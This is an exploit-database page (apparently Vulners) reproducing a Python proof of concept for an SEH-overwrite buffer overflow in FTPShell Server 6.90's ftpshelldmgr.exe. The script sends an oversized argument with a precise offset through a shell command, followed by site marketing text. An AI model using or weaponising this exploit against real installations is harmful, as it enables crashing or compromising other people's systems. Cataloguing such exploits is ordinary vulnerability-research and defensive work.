Vulners
Lucene search
FTPShell Server 6.90 Buffer Overflow Exploit
# Exploit Title: FTPShell Server 6.90 (ftpshelldmgr.exe)- Buffer Overflow (SEH)(PoC)
# Exploit Author: Saeed reza Zamanian
# Vendor: Code Origin
# Vendor Homepage: https://www.ftpshell.com/
# Software Link: https://www.ftpshell.com/downloadserver.htm
# Version: 6.90 Release Date : Jan 31, 2020
# Tested On: Windows 7 Ultimate -- Build 7601 x64-based PC
# Tested On: Windows Vista SP2 -- build 6002 32-bit
#
# Replicate Crash:
# 1) Download, Install, the application
# 2) Execute the exploit (with administrative permissions)
# 3) Crash with SEH Overwrite
#
# You can also use "/installlic {PAYLOAD}" in arguments field in your debugger (immunity or olly)
# SEH chain of main thread
# Address SE handler
# 0020FBFC 43434343
# 42424242 *** CORRUPT ENTRY ***
#!/usr/bin/python
import os
directory = 'C:\Program Files\FTPShellServer\\' #default
#directory = 'C:\Program Files (x86)\FTPShellServer\\' #directory_for_x64
offset = '\x41'*1112
nSEH = '\x42\x42\x42\x42'
SEH = '\x43\x43\x43\x43'
payload = offset+nSEH+SEH
try:
print("[+] Creating %s sending evil payload." %len(payload))
comm = ('cd '+directory+' && ftpshelldmgr.exe /installlic '+payload)
stream = os.popen(comm)
output = stream.read()
print("[+] payload sent!")
except:
print("Failed.")
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2020 00:00Current
0.2Low risk
Vulners AI Score0.2